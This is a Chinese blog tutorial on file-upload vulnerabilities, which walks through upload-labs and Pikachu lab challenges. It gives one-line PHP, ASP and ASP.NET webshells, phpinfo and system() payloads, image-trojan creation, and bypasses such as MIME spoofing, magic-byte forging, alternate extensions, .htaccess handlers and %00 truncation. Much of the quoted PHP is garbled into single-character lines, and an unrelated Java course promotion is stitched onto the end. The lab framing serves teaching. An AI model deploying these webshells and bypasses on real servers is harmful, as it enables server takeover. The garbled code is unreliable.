大家好!
我是小黄,很高兴又跟大家见面啦 !
拒绝水文,从我做起 !!!!
未经允许,禁止转载 ,违者必究!!!!
本实验仅适用于学习和测试 ,严禁违法操作 ! ! !
今天更新的是:
文件上传】,即可获取本文全部涉及到的工具。创建时间:2021年5月9日
软件: MindMaster Pro
Web应用之上的远程控制程序。一张网页,由PHP、JSP、ASP、ASP.NET等这类web应用程序语言开发,但webShell并不具备常见网页的功能,例如登录、注册、信息展示等功能,一般会具备文件管理、端口扫描、提权、获取系统信息等功能。大马。小马。一句话木马、菜刀马、脱库马等等的名词,是对于webShell功能或者特性的简称。前期准备:
- 安装一下集成环境:这里推荐使用
PHPstudy 2018、(PHPstudy 2018 可以在我的微信公众号获取)- 安装好环境之后我们来编写一个一句话木马(如何编写我们之后详细讲解)
- 写好之后呢,我们进行本地利用。

掏出我们之前准备好的一句话木马,放在phpStudyPHPTutorialWWW目录下
本地访问: 127.0.0.1/shell.php(我们刚才创建的木马文件名称)
打开HackBar(浏览器插件):尝试利用这个一句话木马来返回PHPinfo的信息
构建返回PHPinfo的语句:X=phpinfo();这也是一个任意代码执行,我们通过变量X传递的任何指令都会被当做PHP代码来执行。也可以通过这条指令来调用调用系统函数:X=system(whomai); 、x=system(whomai);



$_POST[x]: 获取 POST请求参数中X的值。例如POST请求中传递 x=phpinfo();,那么 $_POST[x]就等同于phpinfo();
eval()将字符串当做PHP代码去执行。例如 eval('phpinfo();'),其中 phpinfo();会被当做PHP代码去执行。
↓
↓
↓
我们通过该webshell,传递任意PHP代码,让其去执行,从而达到任意代码执行。
错误控制运算符,当将 @放置在一个PHP表达式之前,该表达式可能产生的任何错误信息都被 忽略掉。
ASP:
<%eval request(“x”)%>
ASP.NET:
<%@ Page Language=“Jscript”%><%eval (Request.Item[“x”],“unsafe”);%>
这些一句话木马的本质是一样的,不同环境要用不同的一句话木马。
添加数据



猪猪



1234







@会产生怎样的效果呢?

文件上传功能,例如头像更改,文章编辑,附件上传等等。
本地文件上传至服务器上进行保存。可以尝试用pickchu靶场进行复现。


假设文件上传功能没有对上传的文件进行限制,可能会引发哪些安全风险
如果是对方是LAMP架构,是否能上传PHP的WebShell到服务端上,然后通过访问上传后的文件地址,从而执行WebShell中的代码。达到控制对方服务器的目的。
实验演示:
让我们禁用JS来跳过验证来上传一句话木马

phpinfo的信息。返回信息成功之后,让我们挂上蚁剑。


没有对上传的文件做合理严谨的过滤,导致用户可以利用此功能,上传能被服务端解析执行的文件,并通过此文件获得执行服务端命令的能力。


打开upload-labs 靶场第一题 - JS检查
源码分析
这里先是包含几个文件,然后出现了一些新的函数
file_exists函数检查文件或目录是否存在。如果指定的文件或目录存在则返回 TRUE,否则返回 FALSE。
而UPLOAD_PATH这个常量在config.php文件中,有这么一段代码define("UPLOAD_PATH", "../upload");,进行了设置。
那这个$_FILES['upload_file']['tmp_name']又是哪儿冒出来的呢,upload_file就是文件上传的表单的名字,如下图

这里是$_FILES中的那些参数:
$_FILES这个变量用与上传的文件参数设置,是一个多维数组
数组的用法就是 $_FILES[‘key’][‘key2’];
$_FILES[‘upfile’]是你表单上传的文件信息数组,upfile是文件上传字段,在上传时由服务器根据上传字段设定。
$_FILES[‘upfile’]包含了以下内容:
$_FILES[‘upfile’][‘name’] 客户端文件的原名称。
$_FILES[‘upfile’][‘type’] 文件的 MIME 类型,需要浏览器提供该信息的支持,例如"image/gif"。
$_FILES[‘upfile’][‘size’] 已上传文件的大小,单位为字节。
$_FILES[‘upfile’][‘tmp_name’] 文件被上传后在服务端储存的临时文件名。
$_FILES[‘upfile’][‘error’] 和该文件上传相关的错误代码。
下面这段js代码定义了检查上传文件的函数
个人倾向性于第一个,我觉得可以选择禁用JS简单快捷高效,第二个的话功能比较多一些,但是也会禁用掉正常页面的JS



php、再进行发送,从而实现文件上传

“所有前端的验证机制都是不安全的”,因为前端的东西是用户可控制的。内容类型的因特网标准。
打开upload-labs 靶场第二题 - JS检查
源码分析
$is_upload = false;
m
s
g
=
n
u
l
l
;
i
f
(
i
s
s
e
t
(
msg = null; if (isset(
msg=null;if(isset(_POST[‘submit’])) {
if (file_exists(UPLOAD_PATH)) {
if ((
F
I
L
E
S
[
′
u
p
l
o
a
d
f
i
l
e
′
]
[
′
t
y
p
e
′
]
=
=
′
i
m
a
g
e
/
j
p
e
g
′
)
∣
∣
(
_FILES['upload_file']['type'] == 'image/jpeg') || (
FILES[′uploadfile′][′type′]==′image/jpeg′)∣∣(_FILES[‘upload_file’][‘type’] == ‘image/png’) || ($_FILES[‘upload_file’][‘type’] == ‘image/gif’)) {
$temp_file = $_FILES[‘upload_file’][‘tmp_name’];
$img_path = UPLOAD_PATH . ‘/’ .
F
I
L
E
S
[
′
u
p
l
o
a
d
f
i
l
e
′
]
[
′
n
a
m
e
′
]
;
i
f
(
m
o
v
e
u
p
l
o
a
d
e
d
f
i
l
e
(
_FILES['upload_file']['name']; if (move_uploaded_file(
FILES[′uploadfile′][′name′];if(moveuploadedfile(temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = ‘上传出错!’;
}
} else {
$msg = ‘文件类型不正确,请重新上传!’;
}
} else {
$msg = UPLOAD_PATH.‘文件夹不存在,请手工创建!’;
}
}
可以看到,其实并没有什么特别之处,就是使用了$_FILES['upload_file']['type']获取到Content-Type字段,并进行比较,如果是那三种类型就继续向下执行,否则进行提示。


可以尝试用pickchu靶场进行复现。
JPG: FF D8 FF EO 00 10 4A 46 49 46.GIF:47 49 46 3839 61(GIF89a).PNG:89 50 4E 47
打开upload-labs 靶场第十三题 - 图片马绕过
源码分析
function getReailFileType($filename){
f
i
l
e
=
f
o
p
e
n
(
file = fopen(
file=fopen(filename, “rb”);
b
i
n
=
f
r
e
a
d
(
bin = fread(
bin=fread(file, 2); //只读2字节
fclose($file);
$strInfo = @unpack(“C2chars”, $bin);
t
y
p
e
C
o
d
e
=
i
n
t
v
a
l
(
typeCode = intval(
typeCode=intval(strInfo[‘chars1’].$strInfo[‘chars2’]);
f
i
l
e
T
y
p
e
=
′
′
;
s
w
i
t
c
h
(
fileType = ''; switch(
fileType=′′;switch(typeCode){
case 255216:
$fileType = ‘jpg’;
break;
case 13780:
$fileType = ‘png’;
break;
case 7173:
$fileType = ‘gif’;
break;
default:
$fileType = ‘unknown’;
}
return $fileType;
}
$is_upload = false;
m
s
g
=
n
u
l
l
;
i
f
(
i
s
s
e
t
(
msg = null; if(isset(
msg=null;if(isset(_POST[‘submit’])){
$temp_file = $_FILES[‘upload_file’][‘tmp_name’];
f
i
l
e
t
y
p
e
=
g
e
t
R
e
a
i
l
F
i
l
e
T
y
p
e
(
file_type = getReailFileType(
filetype=getReailFileType(temp_file);
if($file_type == 'unknown'){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
方法一: 伪造文件头绕过方法
方法二: 利用服务器将木马文件解析成了图片文件,因此向其发送执行该文件的请求时,服务器只会返回这个“图片”文件,并不会执行相应命令。
利用 文件包含漏洞 可以将图片格式的文件当做php文件来解析执行:http://127.0.0.1/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2021/03/20/9439796055e7a8d1a39396276569.jpg&submit=提交查询
模板:http://127.0.0.1/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/上传文件的回显路径&submit=提交查询

- 在路径下准备好一句话木马.php和一张图片 .png (或者 .jpg )
- 输入系统指令:
copy 一张图片.png/b+一句话木马.php/a 生成图片名称.png- 这样图片木马就合成好了




后缀名大小写绕过原理:服务端没有将后缀名转换为统一格式进行比对,导致可以上传后缀为pHp的文件,又因为Windows操作系统大小写不敏感,所以.pHp扔回被当成PHP文件解析。
$is_upload = false;
m
s
g
=
n
u
l
l
;
i
f
(
i
s
s
e
t
(
msg = null; if (isset(
msg=null;if(isset(_POST[‘submit’])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(“.php”,“.php5”,“.php4”,“.php3”,“.php2”,“.html”,“.htm”,“.phtml”,“.pht”,“.pHp”,“.pHp5”,“.pHp4”,“.pHp3”,“.pHp2”,“.Html”,“.Htm”,“.pHtml”,“.jsp”,“.jspa”,“.jspx”,“.jsw”,“.jsv”,“.jspf”,“.jtml”,“.jSp”,“.jSpx”,“.jSpa”,“.jSw”,“.jSv”,“.jSpf”,“.jHtml”,“.asp”,“.aspx”,“.asa”,“.asax”,“.ascx”,“.ashx”,“.asmx”,“.cer”,“.aSp”,“.aSpx”,“.aSa”,“.aSax”,“.aScx”,“.aShx”,“.aSmx”,“.cEr”,“.sWf”,“.swf”,“.htaccess”);
f
i
l
e
n
a
m
e
=
t
r
i
m
(
file_name = trim(
filename=trim(_FILES[‘upload_file’][‘name’]);
f
i
l
e
n
a
m
e
=
d
e
l
d
o
t
(
file_name = deldot(
filename=deldot(file_name);//删除文件名末尾的点
f
i
l
e
e
x
t
=
s
t
r
r
c
h
r
(
file_ext = strrchr(
fileext=strrchr(file_name, ‘.’);
f
i
l
e
e
x
t
=
s
t
r
i
r
e
p
l
a
c
e
(
′
:
:
file_ext = str_ireplace('::
fileext=strireplace(′::DATA’, ‘’,
f
i
l
e
e
x
t
)
;
/
/
去除字符串
:
:
file_ext);//去除字符串::
fileext);//去除字符串::DATA
f
i
l
e
e
x
t
=
t
r
i
m
(
file_ext = trim(
fileext=trim(file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
通过源代码我们可以发现,黑名单里虽然过滤的很全面,但是在下面的后缀名处理之中却出现了纰漏,没有将后缀名转换为小写。
f i l e e x t = s t r t o l o w e r ( file_ext = strtolower( fileext=strtolower(file_ext); //转换为小写
这样的话,我们就可以进行大小写绕过了。首先来说,直接上传后缀名为.pHP的文件成功。
源码分析
$is_upload = false;
m
s
g
=
n
u
l
l
;
i
f
(
i
s
s
e
t
(
msg = null; if (isset(
msg=null;if(isset(_POST[‘submit’])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(‘.asp’,‘.aspx’,‘.php’,‘.jsp’);
f
i
l
e
n
a
m
e
=
t
r
i
m
(
file_name = trim(
filename=trim(_FILES[‘upload_file’][‘name’]);
f
i
l
e
n
a
m
e
=
d
e
l
d
o
t
(
file_name = deldot(
filename=deldot(file_name);//删除文件名末尾的点
f
i
l
e
e
x
t
=
s
t
r
r
c
h
r
(
file_ext = strrchr(
fileext=strrchr(file_name, ‘.’);
f
i
l
e
e
x
t
=
s
t
r
t
o
l
o
w
e
r
(
file_ext = strtolower(
fileext=strtolower(file_ext); //转换为小写
f
i
l
e
e
x
t
=
s
t
r
i
r
e
p
l
a
c
e
(
′
:
:
file_ext = str_ireplace('::
fileext=strireplace(′::DATA’, ‘’,
f
i
l
e
e
x
t
)
;
/
/
去除字符串
:
:
file_ext);//去除字符串::
fileext);//去除字符串::DATA
f
i
l
e
e
x
t
=
t
r
i
m
(
file_ext = trim(
fileext=trim(file_ext); //收尾去空
if(!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
用黑名单不允许上传.asp,.aspx,.php,.jsp后缀的文件
但可以上传.phtml .phps .php5 .pht
前提是apache的httpd.conf中有如下配置代码
AddType application/x-httpd-php .php .phtml .phps .php5 .pht
当我们修改文件后缀名之后,可以发现到文件正常上传成功。

RAW包中可以查找到文件上传的位置。
http://127.0.0.1/upload/upload/202105181219104196.php5http://127.0.0.1/upload/文件上传路径该URL模板只适用该案例
服务端将黑名单的后缀名替换为空,但仅进行一次。上传.phphpp后缀,替换php一次为空,则后缀
$is_upload = false;
m
s
g
=
n
u
l
l
;
i
f
(
i
s
s
e
t
(
msg = null; if (isset(
msg=null;if(isset(_POST[‘submit’])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(“php”,“php5”,“php4”,“php3”,“php2”,“html”,“htm”,“phtml”,“pht”,“jsp”,“jspa”,“jspx”,“jsw”,“jsv”,“jspf”,“jtml”,“asp”,“aspx”,“asa”,“asax”,“ascx”,“ashx”,“asmx”,“cer”,“swf”,“htaccess”);
$file_name = trim($_FILES['upload_file']['name']);
$file_name = str_ireplace($deny_ext,"", $file_name);
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
黑名单规则不严谨,在某些特定环境中某些特殊后缀名仍会被当做PHP文件解析。phplphp2/php3/php4lphp5/php6lphp7/phtlphtm/phtml

可以通过设置可以将该目录下的所有文件作为php文件来解析.htaccess可以写入apache配置信息,改变当前目录以及子目录的Apache配置信息。
方法一: 所有jpg后祭都会背当做PHP解析

方法二: 带有jpg关键字会被当岗PHP解析
SetHandler application/x-httpd-php
window对于文件和文件名的限制,以下字符放在结尾时,不符合操作系统的命名规范,在最后生成文件时,字符会被自动去除。
源码分析:
第一种: 对应upland第6题
$is_upload = false;
m
s
g
=
n
u
l
l
;
i
f
(
i
s
s
e
t
(
msg = null; if (isset(
msg=null;if(isset(_POST[‘submit’])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(“.php”,“.php5”,“.php4”,“.php3”,“.php2”,“.html”,“.htm”,“.phtml”,“.pht”,“.pHp”,“.pHp5”,“.pHp4”,“.pHp3”,“.pHp2”,“.Html”,“.Htm”,“.pHtml”,“.jsp”,“.jspa”,“.jspx”,“.jsw”,“.jsv”,“.jspf”,“.jtml”,“.jSp”,“.jSpx”,“.jSpa”,“.jSw”,“.jSv”,“.jSpf”,“.jHtml”,“.asp”,“.aspx”,“.asa”,“.asax”,“.ascx”,“.ashx”,“.asmx”,“.cer”,“.aSp”,“.aSpx”,“.aSa”,“.aSax”,“.aScx”,“.aShx”,“.aSmx”,“.cEr”,“.sWf”,“.swf”,“.htaccess”);
$file_name = $_FILES[‘upload_file’][‘name’];
f
i
l
e
n
a
m
e
=
d
e
l
d
o
t
(
file_name = deldot(
filename=deldot(file_name);//删除文件名末尾的点
f
i
l
e
e
x
t
=
s
t
r
r
c
h
r
(
file_ext = strrchr(
fileext=strrchr(file_name, ‘.’);
f
i
l
e
e
x
t
=
s
t
r
t
o
l
o
w
e
r
(
file_ext = strtolower(
fileext=strtolower(file_ext); //转换为小写
f
i
l
e
e
x
t
=
s
t
r
i
r
e
p
l
a
c
e
(
′
:
:
file_ext = str_ireplace('::
fileext=strireplace(′::DATA’, ‘’,
f
i
l
e
e
x
t
)
;
/
/
去除字符串
:
:
file_ext);//去除字符串::
fileext);//去除字符串::DATA
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件不允许上传';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
这题没有对后缀名进行去空,因此可以在后缀名加空格绕过

%00是chr(O),它不是空格,是NULL,空字符。
当程序在输出含有chr(O)变量时,chr(O)后面的数据会被停止,换句话说,就是误把它当做结束符,后面的数据直接忽略,这就导致漏洞产生的原因。
在文件上传中,利用%00截断,在文件扩展名验证时,是取文件的扩展名来做验证,但是最后文件保存在本地时,%00会截断文件名,只保存%00之前的内容。
前提条件: PHP版本 < 5.34 、php的magic_quotes_gpc为OFF状态
源码分析:
第一种: 对应upland第11题
$is_upload = false;
m
s
g
=
n
u
l
l
;
i
f
(
i
s
s
e
t
(
msg = null; if(isset(
msg=null;if(isset(_POST[‘submit’])){
$ext_arr = array(‘jpg’,‘png’,‘gif’);
f
i
l
e
e
x
t
=
s
u
b
s
t
r
(
file_ext = substr(
fileext=substr(_FILES[‘upload_file’][‘name’],strrpos(
F
I
L
E
S
[
′
u
p
l
o
a
d
f
i
l
e
′
]
[
′
n
a
m
e
′
]
,
"
.
"
)
+
1
)
;
i
f
(
i
n
a
r
r
a
y
(
_FILES['upload_file']['name'],".")+1); if(in_array(
FILES[′uploadfile′][′name′],".")+1);if(inarray(file_ext,$ext_arr)){
$temp_file = $_FILES[‘upload_file’][‘tmp_name’];
$img_path =
G
E
T
[
′
s
a
v
e
p
a
t
h
′
]
.
"
/
"
.
r
a
n
d
(
10
,
99
)
.
d
a
t
e
(
"
Y
m
d
H
i
s
"
)
.
"
.
"
.
_GET['save_path']."/".rand(10, 99).date("YmdHis").".".
GET[′savepath′]."/".rand(10,99).date("YmdHis").".".file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
}
}
白名单判断,但$img_path是直接拼接,因此可以利用%00截断绕过。
$img_path = G E T [ ′ s a v e p a t h ′ ] . " / " . r a n d ( 10 , 99 ) . d a t e ( " Y m d H i s " ) . " . " . _GET['save_path']."/".rand(10, 99).date("YmdHis").".". GET[′savepath′]."/".rand(10,99).date("YmdHis").".".file_ext;
第二种: 对应upland第19题
前提条件: PHP版本 < 5.34 、php的magic_quotes_gpc为OFF状态
源码分析:
$is_upload = false;
m
s
g
=
n
u
l
l
;
i
f
(
i
s
s
e
t
(
msg = null; if (isset(
msg=null;if(isset(_POST[‘submit’])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(“php”,“php5”,“php4”,“php3”,“php2”,“html”,“htm”,“phtml”,“pht”,“jsp”,“jspa”,“jspx”,“jsw”,“jsv”,“jspf”,“jtml”,“asp”,“aspx”,“asa”,“asax”,“ascx”,“ashx”,“asmx”,“cer”,“swf”,“htaccess”);
$file_name = $_POST['save_name'];
$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!in_array($file_ext,$deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' .$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
}else{
$msg = '上传出错!';
}
}else{
$msg = '禁止保存为该类型文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
发现move_uploaded_file()函数中的img_path是由post参数save_name控制的,因此可以在save_name利用00截断绕过,方法同上

从右到左。例如shel.php.gix.ccc,apache会先识别ccc,ccc不被识别,则识别gix,以此类推,最后会被识别为php来运行。.asp、.asa、.cer,则目录下的所有文件都会被作为ASPurl/test.asp/shell.jpg会被当作asp脚本运行。.asp;、.asa;、.cer;。url/test.asp;shell.jpg会被当作asp脚本运行。.asa,.cer,.cdx都会被作为asp文件执行。url/shell.asa会被作为asp文件执行。url/shell.jpg/shell.php时,shell.jpg会被当作php去执行。了解shell.jpg文件,注意最后为空格url/shell.jpg[Ox20][Ox00].php如果大家对博主还有其他的意见,或者对文章中有那些不明白可以私信博主,博主将尽心尽力为您解决。各位路过的朋友,如果觉得可以学到些什么的话,点个赞 再走吧,欢迎各位路过的大佬评论,指正错误,也欢迎有问题的小伙伴评论留言,私信。
每个小伙伴的关注都是本人更新博客的动力!!!
请微信搜索【 】文章更新将在第一时间阅读 !
博客中若有不恰当的地方,请您一定要告诉我。前路崎岖,望我们可以互相帮助,并肩前行!
先自我介绍一下,小编13年上师交大毕业,曾经在小公司待过,去过华为OPPO等大厂,18年进入阿里,直到现在。深知大多数初中级java工程师,想要升技能,往往是需要自己摸索成长或是报班学习,但对于培训机构动则近万元的学费,着实压力不小。自己不成体系的自学效率很低又漫长,而且容易碰到天花板技术停止不前。因此我收集了一份《java开发全套学习资料》送给大家,初衷也很简单,就是希望帮助到想自学又不知道该从何学起的朋友,同时减轻大家的负担。添加下方名片,即可获取全套学习资料哦